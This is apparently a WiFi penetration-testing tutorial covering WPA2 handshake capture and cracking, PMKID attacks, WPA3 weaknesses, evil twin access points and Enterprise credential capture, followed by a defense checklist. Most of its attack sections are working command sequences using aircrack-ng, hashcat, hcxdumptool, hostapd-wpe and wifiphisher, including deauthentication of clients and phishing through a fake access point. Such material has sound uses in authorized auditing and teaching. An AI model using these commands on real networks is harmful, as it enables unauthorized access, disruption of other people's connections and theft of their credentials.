Key Takeaways
- WPA2-PSK can still be cracked with weak passwords
- WPA3 has SAE but isn't perfect
- Evil Twin attacks bypass encryption
- 802.1X Enterprise is significantly more secure
Contents
1. Wireless Security Fundamentals
Wireless networks are inherently less secure than wired—anyone in range can capture traffic. Understanding WiFi security protocols is essential for both attackers and defenders.
WiFi Security Evolution
- WEP: Deprecated, trivially crackable in minutes
- WPA: TKIP, improved but still vulnerable
- WPA2-PSK: AES-CCMP, vulnerable to offline dictionary attacks
- WPA2-Enterprise: 802.1X, individual credentials
- WPA3: SAE (dragonfly), improved resistance to attacks
2. Wireless Reconnaissance
# Put wireless interface in monitor mode
airmon-ng start wlan0
# Scan for networks
airodump-ng wlan0mon
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Information gathered:
# - BSSID (MAC address)
# - Channel
# - Encryption type (WPA2, WPA3)
# - Connected clients
# - Signal strength3. WPA/WPA2 Cracking
4-Way Handshake Capture
# Capture handshake (wait for client connect or deauth)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Force client to reconnect (deauthentication)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# Crack with wordlist
aircrack-ng -w rockyou.txt handshake.cap
# GPU cracking with hashcat
hcxpcapngtool handshake.cap -o hash.hc22000
hashcat -m 22000 hash.hc22000 rockyou.txtPMKID Attack (Client-less)
# Capture PMKID (no client needed!)
hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1
# Convert and crack
hcxpcapngtool dump.pcapng -o pmkid.hc22000
hashcat -m 22000 pmkid.hc22000 wordlist.txt4. WPA3 Security
WPA3 uses SAE (Simultaneous Authentication of Equals) which replaces PSK. It's resistant to offline dictionary attacks.
WPA3 Vulnerabilities
- Dragonblood: Side-channel attacks on SAE
- Transition mode: Downgrade to WPA2
- Implementation bugs: Vendor-specific issues
5. Evil Twin Attacks
Evil Twin (Rogue AP)
Create a fake AP with the same SSID. Victims connect and send credentials through attacker.
# Create evil twin with hostapd-wpe
# 1. Set up fake AP
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# 2. Deauth clients from real AP
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# 3. Capture credentials as clients connect to fake AP
# Automated with wifiphisher
wifiphisher -i wlan0 -e "Corporate WiFi"6. Enterprise WiFi Attacks
# EAP-PEAP/MSCHAPv2 credential capture
# Use hostapd-wpe to capture RADIUS credentials
# Start evil twin with RADIUS
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Captured credentials format:
# username:NETNTLM_HASH
# Crack with hashcat
hashcat -m 5500 enterprise_hashes.txt wordlist.txt7. Defense Strategies
Wireless Security Checklist
- Use WPA3 where possible, WPA2-Enterprise otherwise
- Long, complex passwords: 15+ chars for PSK
- 802.1X authentication: Individual credentials, certificate validation
- Network segmentation: Guest, IoT, corporate
- Wireless IDS: Detect rogue APs
- Management frame protection: 802.11w
- MAC filtering: Weak but adds layer
- Disable WPS: Known vulnerabilities
8. Essential Tools
- Aircrack-ng: Suite for WiFi auditing
- hcxtools: PMKID and handshake tools
- Wifite: Automated WiFi attacks
- hostapd-wpe: Evil twin with credential capture
- Wifiphisher: Phishing attacks via WiFi
- Bettercap: Network reconnaissance and attacks
# Recommended hardware:
# - Alfa AWUS036ACH (dual band, monitor mode)
# - Alfa AWUS036ACM
# - Panda PAU09FAQ
Is cracking WiFi passwords illegal?
Yes, accessing networks without authorization is illegal. Only test networks you own or have written permission to test.